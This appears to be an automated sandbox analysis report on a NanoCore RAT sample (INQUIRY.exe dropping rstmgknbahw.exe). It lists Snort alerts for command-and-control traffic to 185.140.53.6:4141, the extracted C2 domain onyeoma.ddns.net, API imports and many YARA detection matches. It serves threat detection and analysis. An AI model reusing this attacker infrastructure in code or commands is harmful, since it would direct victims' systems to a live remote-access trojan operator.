      Source: Binary string: wntdll.pdbUGP source: INQUIRY.exe, 00000001.00000003.662943536.00000000033B0000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659087283.0000000003220000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.702841984.00000000030F0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.698655774.0000000003280000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.709826822.00000000030E0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.711484064.0000000003270000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: INQUIRY.exe, 00000001.00000003.662943536.00000000033B0000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659087283.0000000003220000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.702841984.00000000030F0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.698655774.0000000003280000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.709826822.00000000030E0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.711484064.0000000003270000.00000004.00000001.sdmp
      Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918001760.0000000000807000.00000004.00000020.sdmp
      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
      Source: Binary string: rlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00405D7C FindFirstFileA,FindClose,1_2_00405D7C
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004053AA
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00402630 FindFirstFileA,1_2_00402630
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_00404A29 FindFirstFileExW,4_2_00404A29
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_1_00404A29 FindFirstFileExW,4_1_00404A29
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 5_2_00405D7C FindFirstFileA,FindClose,5_2_00405D7C
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 5_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_004053AA
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 5_2_00402630 FindFirstFileA,5_2_00402630
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_2_00404A29 FindFirstFileExW,6_2_00404A29
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_1_00404A29 FindFirstFileExW,6_1_00404A29

      Networking

      barindex
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49735 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49742 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49743 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49750 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49757 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49760 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49767 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49774 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49777 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49778 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49779 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49782 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49788 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49789 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49791 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49792 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49810 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49827 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49831 -> 185.140.53.6:4141
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49833 -> 185.140.53.6:4141
      Source: Malware configuration extractorURLs: onyeoma.ddns.net
      Source: Malware configuration extractorURLs: 127.0.0.1
      Source: unknownDNS query: name: onyeoma.ddns.net
      Source: Joe Sandbox ViewASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
      Source: Joe Sandbox ViewIP Address: 185.140.53.6 185.140.53.6
      Source: global trafficTCP traffic: 192.168.2.4:49735 -> 185.140.53.6:4141
      Source: rstmgknbahw.exe, rstmgknbahw.exe, 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmp, rstmgknbahw.exe, 00000005.00000000.695461777.0000000000409000.00000008.00020000.sdmp, rstmgknbahw.exe, 00000006.00000000.707759536.0000000000409000.00000008.00020000.sdmp, INQUIRY.exe, rstmgknbahw.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: INQUIRY.exe, rstmgknbahw.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: unknownDNS traffic detected: queries for: onyeoma.ddns.net
      Source: INQUIRY.exe, 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404F61

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.3820e14.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.382543d.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.3950e14.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.3950e14.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.39a98c0.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.395543d.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.39adee9.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.39a98c0.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.3820e14.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTR

      System Summary

      barindex
      Source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.rstmgknbahw.exe.3820e14.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.rstmgknbahw.exe.382543d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.rstmgknbahw.exe.3950e14.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
